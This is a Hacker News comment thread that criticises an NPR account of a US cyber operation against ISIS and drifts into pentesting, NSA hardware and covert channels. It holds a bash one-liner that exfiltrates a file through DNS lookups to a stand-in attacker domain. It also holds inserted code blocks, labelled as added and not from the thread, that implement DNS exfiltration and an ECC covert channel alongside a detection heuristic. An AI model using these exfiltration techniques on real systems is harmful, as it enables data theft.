by segfaultbuserr 2098 days ago
I fully understand that the operation is classified and details cannot be revealed, but I have to say: the description of the technical details is still a bad Hollywood movie [0]...

> After that, the momentum started to build. One team would take screenshots to gather intelligence for later; another would lock ISIS videographers out of their own accounts.

> "Reset Successful" one screen would say.

> "Folder directory deleted," said another.

Folder directory??? Did they also delete the "file document"?

> The screens they were seeing on the Ops floor on the NSA campus were the same ones someone in Syria might have been looking at in real time, until someone in Syria hit refresh. Once he did that, he would see: 404 error: Destination unreadable.

404 error: Destination unreadable??? At least, use "unreachable"...

> "Target 5 is done," someone would yell.

> Someone else would walk across the room and cross the number off the big target sheet on the wall. "We're crossing names off the list. We're crossing accounts off the list. We're crossing IPs off the list," said Neil. And every time a number went down they would yell one word: "Jackpot!"

[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is used not only to describe hacking, but actually to put it into practice. Characters will come up with rubbish like, "Extinguish the firewall!" and "I'll use the Millennium Bug to launch an Overclocking Attack on the whole Internet!" https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking

6 comments

Agreed. The whole article reads like a mix of Hollywood Hacking and a puff piece.

Very likely something happened, but it almost certainly wasn't like this.

The article is different from what was aired, which appears to me to be more interesting, as it starts with:

"On August 24, 2015, a 21-year-old British hacker named TriCk stepped out of an Internet cafe in Raqqa, Syria, and climbed into his car. He didn't know it, but he'd been under surveillance for days. He pulled into a gas station, and just as he started filling the tank, a single Hellfire missile came down on him like a meteor from the sky. He was killed instantly."

And it seems to be longer too.

https://www.npr.org/transcripts/763545811

They also later identify the "British hacker's" name: Junaid Hussain.

A report from Britain, 2015, claims it wasn't an operation done by the U.S. alone:

https://www.birminghammail.co.uk/news/midlands-news/isis-ter...

@acqq: "On August 24, 2015, a 21-year-old British hacker named TriCk stepped out of .."

That story, and that's what it is, has to be put in the form of a bad movie, considering the intellectual level of the target audience.

https://xkcd.com/538/ with a USD 70k wrench? (even at that price, and including delivery, those wrenches sound much cheaper than Operation Glowing Symphony as described, involving headcount from at least three eyes)

Kipling on empire, in Her Majesty's Servants (a story addressed to children but not necessarily intended for them):

> "But are the beasts as wise as the men?" said the chief.

> "They obey, as the men do. Mule, horse, elephant, or bullock, he obeys his driver, and the driver his sergeant, and the sergeant his lieutenant, and the lieutenant his captain, and the captain his major, and the major his colonel, and the colonel his brigadier commanding three regiments, and the brigadier his general, who obeys the Viceroy, who is the servant of the Empress. Thus it is done."

> "Would it were so in Afghanistan!" said the chief; "for there we obey only our own wills."

> "And for that reason," said the native officer, twirling his moustache, "your Amir whom you do not obey must come here and take orders from our Viceroy."

Returning to the topic and 2020, from the transcript of the 50-minute show I've mentioned:

"Nakasone said the American people shouldn't worry about the 2020 elections because Cybercom is prepared to prevent the Russians from repeating what they did in 2016."

"TEMPLE-RASTON: Even saying that much is new. Remember - offensive cyber not so long ago was something they didn't talk about, and now, all of a sudden, they seem to be. So why is General Nakasone talking about this now?

DEIBERT: What's happening here is part of a deterrent justification."

Then they give an explanation of this using some lines from Dr. Strangelove.

By the way, the show was "written and hosted by Dina Temple-Raston," who also wrote the article, and I liked the show.

-----

Edit: responding to "deterrent could easily be communicated privately" below: -- no, that's too narrow thinking: consider the potential target as "anybody who'd be willing to try it at home." That's a much bigger target group than potential workers. Also consider every "it" that people would be potentially scared to do.

Edit2: re. the edit of the post below involving joke with the submarines -- I fail to see any relation to anything discussed here, and I'd also like to know if anybody but the writer even understands what the joke is. I honestly don't. Meh.

Edit3: re "MAD": Like I've said I don't believe it's about MAD, but "anybody who'd be willing to try it at home." Anybody in front of the computer anywhere in the world, including, but not exclusively, some future "Junaid Hussain." (and, if I'm closer to the correct answer, Cybercom can give me 10 upvotes here).

Edit4: I think I understand it now after it's added that the "joke meant to illustrate MAD" -- I guess he didn't follow the link, but reacted to "Dr. Strangelove" reference believing it's about MAD, even if it never was. As per transcript, it's there to argue: "if you keep it a secret [i.e. American offensive cyber operations] - you could say the same thing about American offensive cyber operations. They've been so stealthy for so long, maybe people don't realize the U.S. has them." Note "people." As is, people wouldn't be scared to do something the U.S. doesn't like, instead of thinking who'd be the target of next U.S. drone attack.

Sorry, I was reacting to the Dr. Strangelove from the article, especially the "end of"[1] description. Maybe it was more obvious in the transcript? I believed it to be about MAD because who, since 2010 (Stuxnet), could plausibly believe that non-decisive[2] American offensive cyber operations are not at least a potential thing?

As written in https://news.ycombinator.com/item?id=24522125 I don't believe everyone apparently having more offensive than defensive capability is necessarily the most stable of situations.

[1] the true end: https://www.youtube.com/watch?v=cIpTE-aHEZ0

On the "mineshaft gap": https://news.ycombinator.com/item?id=23712008

Have you got change for 20 million people? https://boardgamegeek.com/boardgame/713/nuclear-war

[2] "There was too much there to move, and we knew we had to break [Chrome], burn her straight down, or she might come after us."

Not having the whole story arc about Junaid Hussain is the main difference between the show (as seen in the transcript) and the article. I was talking about the former from the start, as it can be easily seen.

The point in the article after mentioning Dr. Strangelove uses however the same wording that I've pointed to:

"You could say the same thing about American offensive cyber operations. They have been so stealthy for so long, maybe people don't realize we have them."

(a) deterrent could easily be communicated, and much more easily clarified, privately.

(b) taking out an electrical grid is not at all comparable to MAD.

I'd imagine domestic recruiting to be more likely, along the lines of the prime-time channel 1 song-and-dance mentioned in: https://news.ycombinator.com/item?id=24453689

==== Edit: joke meant to illustrate (b), the Assured Destruction part that makes MAD a non-iterated game. I agree that if TFA is not about MAD, then threatening Proportional Inconvenience can be an effective deterrent in an iterated game, a deterrent much more applicable to future Hussains than to future Bystrovs. (indeed, in that scenario, I would worry about non-nuclear powers swatting each other via Uscybercom) ====

In the middle of the Caribbean, a US sub, gleaming and spotless, surfaces next to a dingy-in-comparison Russian sub, whose boomers are sprawled out in undershorts and telnyashki, listlessly passing around vodka bottles across a littered foredeck.

One of them is murmuring over and over again, "which one of you idiots threw slippers on control board?"

On the US sub, a dress-uniformed officer in Randolph Engineering glasses emerges from the hatch. "This is the Captain of the USS Alaska. May I speak with your captain, please?"

On board the Russian sub, the only response is the clinking and refilling of glasses.

"I repeat, I am Commander William Dull, captain of the USS Alaska, SSBN 732. I would like to speak with your captain!"

A small fight breaks out on the Russian sub over who last poured.

"Damn it, what is up with you Russkies? Do you call that shipshape? At least we learn discipline back home at King's Bay! Di. Sci. Pline!"

"Don't you get it?" yells back the murmuring Russian, in English now. "Is no King's Bay any more." Then he recommences his Russian refrain, a little more loudly, "Oi, which one of you idiots threw valenki on control board?"

> Folder directory??? Did they also delete the "file document"?

I obviously don't know how accurate this piece is but a "folder directory" is, or at least used to be, a legit way to describe a folder full of folders.

You'll see outdated/unorthodox terminology like this all the time in old systems, and even some newer ones that were built or maintained by people who aren't native English speakers. Daily WTF used to be filled with this kind of stuff.

> a "folder directory" is, or at least used to be, a legit way to describe a folder full of folders.

Thanks, that's interesting.

Ok, I'll tell you how it goes in the real world. I worked for a somewhat HN-famous pentesting company several years ago.

"So, X has been infiltrating <company> for the past few days."

"Really? <company>? <famous company>?"

"Yep. We're keeping them looped in on everything, and they told us to try to get as far as possible. Apparently they were running <outdated version> of <software> on one of their boxes, and <scanner> picked it up."

"That actually happens?"

"He's <highly surprising claim> right now. You'd be surprised how far you can get, jumping from one box to another."

I can't give much more detail than that, for obvious reasons, but the reality is that it's very methodical, very "boring" work. It's basically a giant matrix of probabilities: there are hundreds of thousands of attack vectors, and your job is to tap as many as possible, sorted by probability of effectiveness, until something sticks. Then use your head to get further, adapting to the situation on the fly.

And ... writing reports. Jesus, if someone had told me that 70% of your day would be spent writing reports, I probably wouldn't have joined. But the 30% of other stuff made up for it.

That feeling you get when you break into somewhere you're not supposed to be, and that you were paid to do it, is amazing. The rules change from engagement to engagement, but usually it's "do whatever you want, but don't modify any data, i.e. no destructive actions, and all info you've collected will be deleted at the end of the engagement."

Must be interesting to be a spook in the NSA doing that kind of stuff offensively.

Also, it might seem absurd that I'm comparing this story to the most elite hackers in the developed world. And maybe it is. But if you knew which <company> it was, and exactly what <highly surprising claim> was, you'd be shocked that one or two smart developers poking at internals were able to compromise the entire corporate network of <famous company>, to the point of being able to... well. Let's just say, I wish I could say. It's a weird feeling, seeing it with my own eyes, knowing it's true, and never being able to talk fully about it. :)

So I imagine the NSA spooks are doing similarly methodical work, with some cheat codes like "we intercepted their computer before delivery and installed a backdoor that only activates when we send a specially malformed packet that would normally be dropped and is therefore invisible, which grants us access as needed."

> [...] a specially malformed packet [...]

As far as I understand, error-correcting codes can be and are used at different levels of communication protocols (hardware on each link, hardware at endpoints, software at endpoints, ...).

I often wonder if recoverable errors at the endpoints are ever used to exfiltrate data? The higher levels of the stack would see the corrected overt message, while the underlying levels (hardware or software) that perform the error correction have access to the covert information encoded in the error.

This may be testable by FPGA and sorting connections by protocol, origin, destination, ... to identify connections with suspiciously high amount of ECC recoverable errors as compared to the rest.

This may be very hard to test if MitM'ed (by ISP, network card manufacturer, ...) such that benign packets get recoverable errors introduced as well (to hide the malicious ones in the noise), which would increase the complexity since now the malicious hardware or software at the endpoints needs to discriminate artificial errors from covert messages over the error channel. There would be many ways of going about this.
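A concrete instance of the mechanism described in the comment above, added here as an example and not code from the thread: a Hamming(7,4) link where the covert sender flips one chosen bit per codeword. The ECC layer corrects the overt nibble and throws the error away, while the syndrome (the error position) carries three covert bits per codeword. The overt text, the covert bytes and the bit layout are constructed; the corrected-error counter returned by the overt receiver is the per-connection signal the comment proposes sorting connections by.

```python
"""Covert channel in the error-correction layer (added example, constructed inputs).

Each Hamming(7,4) codeword carries one overt nibble.  The covert sender picks a
symbol 0..7 per codeword: 0 = send the codeword clean, p = flip bit p.  The ECC
layer corrects the flip and hands the upper layer the intact nibble; the error
position itself is the covert payload (3 bits per codeword).
"""


def hamming_encode(nibble):
    """Return the 7-bit codeword (list, index 0 = position 1) for a 4-bit value."""
    d = [(nibble >> k) & 1 for k in range(4)]
    c = [0] * 8                       # 1-indexed scratch array, c[0] unused
    c[3], c[5], c[6], c[7] = d        # data bits at the non-power-of-two positions
    c[1] = c[3] ^ c[5] ^ c[7]         # parity over positions with bit 0 set
    c[2] = c[3] ^ c[6] ^ c[7]         # parity over positions with bit 1 set
    c[4] = c[5] ^ c[6] ^ c[7]         # parity over positions with bit 2 set
    return c[1:]


def hamming_decode(bits):
    """Return (nibble, error_position); position 0 means no error was found."""
    c = [0] + list(bits)
    s1 = c[1] ^ c[3] ^ c[5] ^ c[7]
    s2 = c[2] ^ c[3] ^ c[6] ^ c[7]
    s3 = c[4] ^ c[5] ^ c[6] ^ c[7]
    pos = s1 | (s2 << 1) | (s3 << 2)  # the syndrome is the 1-indexed error position
    if pos:
        c[pos] ^= 1                   # correct it; the upper layer never sees it
    return c[3] | (c[5] << 1) | (c[6] << 2) | (c[7] << 3), pos


def covert_send(overt, covert_bits):
    """Encode overt bytes; spend 3 covert bits per codeword as a single-bit error."""
    assert len(covert_bits) <= 3 * 2 * len(overt), "covert data exceeds link capacity"
    words, k = [], 0
    for byte in overt:
        for nibble in (byte & 0xF, byte >> 4):
            cw = hamming_encode(nibble)
            sym = int(covert_bits[k:k + 3].ljust(3, "0"), 2) if k < len(covert_bits) else 0
            k += 3
            if sym:
                cw[sym - 1] ^= 1      # one correctable error at position sym
            words.append(cw)
    return words


def overt_receive(words):
    """What the upper layer sees: corrected bytes plus a count of errors the ECC fixed."""
    nibbles, corrected = [], 0
    for cw in words:
        n, pos = hamming_decode(cw)
        nibbles.append(n)
        corrected += pos != 0
    data = bytes(nibbles[i] | (nibbles[i + 1] << 4) for i in range(0, len(nibbles), 2))
    return data, corrected


def covert_receive(words):
    """What the ECC layer (or whoever sits at it) can read: the error positions."""
    return "".join(format(hamming_decode(cw)[1], "03b") for cw in words)


def check_all_single_errors():
    """Every single-bit flip of every codeword is corrected and its position recovered."""
    for n in range(16):
        if hamming_decode(hamming_encode(n)) != (n, 0):
            return False
        for p in range(1, 8):
            cw = hamming_encode(n)
            cw[p - 1] ^= 1
            if hamming_decode(cw) != (n, p):
                return False
    return True


def demo(overt=b"Hello, world", covert=b"hunter2"):
    """Constructed round trip: overt text rides the link, covert bytes ride its errors."""
    bits = "".join(format(b, "08b") for b in covert)
    words = covert_send(overt, bits)
    overt_out, corrected = overt_receive(words)
    got = covert_receive(words)[:len(bits)]   # receiver is assumed to know the length
    covert_out = bytes(int(got[i:i + 8], 2) for i in range(0, len(got), 8))
    return {"overt": overt_out, "corrected": corrected, "covert": covert_out}


if __name__ == "__main__":
    print(demo())
```

A clean link would report zero corrected errors on this many codewords, so a stream whose correction count tracks its length rather than the link's noise floor is the anomaly the comment suggests looking for; the comment's follow-on point also holds, since an intermediary that sprinkles in its own correctable errors pushes both the signal and the noise up together.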

If the cheat codes were along the lines of "as long as they're using anyone's routers but Huawei's" they would not even require interception and customisation.

I wish I understood it better, because it's a real technique that the NSA uses, as far as I know. And I agree that it seems like it shouldn't be that simple.

Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.

I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.

But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)

They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.

https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it into the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).

Extremely monitored systems should probably communicate by tape, or cdrom, or similar write-mostly data diode medium. I've heard the US launch network was updated mostly via paper tape for a long time. Today it occurred to me that people could, in principle, hand verify that two short paper tapes were identical, without needing to trust the integrity of any technological black boxes.

> you'd be able to `nslookup foo.com <your special server>` on

You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxed out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.

> Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server

It's even easier than that if you just want to sneak a relatively small file out.

    # base32 survives DNS case folding and has none of base64's '/', '+' or '='; fold keeps each label within the 63-character limit
    for n in $(base32 -w0 mysecretfile | tr -d '=' | fold -w 63); do nslookup "$n.myevildomain.com"; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
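The sender side of the one-liner above together with the receiving end and the defender's view of the same logs, as an added example that is not code from the thread. It keeps the thread's attacker zone, myevildomain.com, and assumes a constructed 256-byte stand-in for the file plus a made-up resolver log-line format; the sequence label and the choice of base32 are explained in the comments.

```python
"""DNS-query exfiltration end to end: sender, receiver, and a log heuristic.

Added example, not code from the thread.  Constructed: SECRET, the log-line
format, and the benign lookups.  myevildomain.com is the zone from the thread.
"""
import base64
import hashlib
import math
import re
from collections import defaultdict

DOMAIN = "myevildomain.com"   # attacker-controlled zone (from the thread's one-liner)
LABEL_MAX = 63                # RFC 1035: a label is at most 63 octets
NAME_MAX = 253                # RFC 1035: a whole name is at most 253 characters
LOG_RE = re.compile(r"query: (\S+) IN ")

# Constructed stand-in for a small key file: 256 pseudorandom but reproducible bytes.
SECRET = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8))


def encode_queries(data, domain=DOMAIN, chunk=50):
    """Sender: split data into names of the form <seq>.<base32 chunk>.<domain>.

    base32 rather than base64 because DNS is case-insensitive (resolvers and
    logs may fold case) and '+', '/' and '=' are not hostname characters.  The
    sequence label lets the receiver reorder and deduplicate retried queries.
    """
    payload = base64.b32encode(data).decode().rstrip("=").lower()
    names = []
    for i in range(0, len(payload), chunk):
        piece = payload[i:i + chunk]
        name = f"{i // chunk}.{piece}.{domain}"
        assert len(piece) <= LABEL_MAX and len(name) <= NAME_MAX
        names.append(name)
    return names


def decode_queries(names, domain=DOMAIN):
    """Receiver: keep queries for our zone, reorder by sequence, drop duplicates."""
    suffix = "." + domain
    pieces = {}
    for n in names:
        n = n.lower().rstrip(".")
        if not n.endswith(suffix):
            continue
        labels = n[:-len(suffix)].split(".")
        if len(labels) != 2 or not labels[0].isdigit():
            continue
        pieces[int(labels[0])] = labels[1]
    if sorted(pieces) != list(range(len(pieces))):
        raise ValueError("missing chunks")
    payload = "".join(pieces[k] for k in sorted(pieces)).upper()
    payload += "=" * (-len(payload) % 8)   # restore the base32 padding we stripped
    return base64.b32decode(payload)


def build_sample_log(exfil_names):
    """Constructed resolver log: routine lookups with the exfil queries mixed in."""
    benign = ["www.example.com", "mail.example.com", "cdn.example.com"] * 20
    return [f"2020-09-20T10:{i // 60:02d}:{i % 60:02d} client 10.0.0.7 query: {name} IN A"
            for i, name in enumerate(benign + exfil_names)]


def parse_log(lines):
    """Pull the queried name out of each (constructed-format) log line."""
    return [m.group(1).rstrip(".") for m in map(LOG_RE.search, lines) if m]


def shannon_entropy(s):
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(k / len(s) * math.log2(k / len(s)) for k in counts.values())


def suspicious_zones(names, min_unique=8, min_entropy=3.5):
    """Defender heuristic: group queries by zone (naively the last two labels)
    and flag zones that receive many distinct names whose longest label looks
    random.  Thresholds are illustrative; tune them against the site's baseline."""
    per_zone = defaultdict(set)
    for n in names:
        labels = n.lower().split(".")
        if len(labels) >= 3:
            per_zone[".".join(labels[-2:])].add(n.lower())
    flagged = {}
    for zone, qs in per_zone.items():
        longest = [max(q.split(".")[:-2], key=len) for q in qs]
        mean_entropy = sum(map(shannon_entropy, longest)) / len(longest)
        if len(qs) >= min_unique and mean_entropy >= min_entropy:
            flagged[zone] = {"unique_names": len(qs), "mean_entropy": round(mean_entropy, 2)}
    return flagged


if __name__ == "__main__":
    names = encode_queries(SECRET)
    assert decode_queries(names[::-1] + names[:2]) == SECRET   # out of order plus retries
    print(suspicious_zones(parse_log(build_sample_log(names))))
```

The receiver does not need to be the server the client is pointed at: as the reply above notes, any recursive resolver forwards unknown names for the zone to its authoritative server, so the chunks arrive in that server's query log regardless of which resolver the victim uses. The same property is what makes the defender's heuristic workable, since the site's own resolver logs see every one of those names on the way out.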

Circumstantial language (suggesting simplicity) in the 2020 defense appropriations bill, note cyber and collection:

https://www.congress.gov/bill/116th-congress/senate-bill/179...

§ 5707 (c)(2): "the implications of [5G] global and regional adoption on the cyber and espionage threat to the United States, the interests of the United States, and the cyber and collection capabilities of the United States;"

It is very possible they are using utilities to pull this off developed by someone else. They may have training for the utilities they have but that doesn't make them IT experts.

They did do one healthy clarification to that effect:

>And what they contained weren't glowing lines of code: Instead, Neil could see login screens.

> "Folder directory deleted," said another.

maybe they're dealing with the kind of people who name their folders "directory"

Or the truly perverse kind who name their directories "Folder"